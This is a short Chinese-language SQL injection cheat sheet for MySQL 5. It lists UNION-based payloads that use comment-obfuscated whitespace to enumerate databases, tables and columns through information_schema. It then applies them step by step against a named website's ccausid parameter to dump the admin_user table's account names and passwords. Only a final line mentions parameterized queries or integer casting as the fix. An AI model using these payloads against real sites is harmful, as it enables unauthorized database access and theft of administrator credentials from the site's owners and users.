查库
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
查表
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
查段
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1

mysql5高级注入方法暴表
例子如下:
1.爆表
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574 为数据库名 yd_teamnet 的16进制编码)
这样爆到第4个时出现了admin_user表。

2.暴字段
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*

3.爆密码
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*

以上语句能够执行,说明 ccausid 参数被直接拼接进了 SQL 查询;防护上应改用参数化查询,或先将 ccausid 强制转换为整数再使用。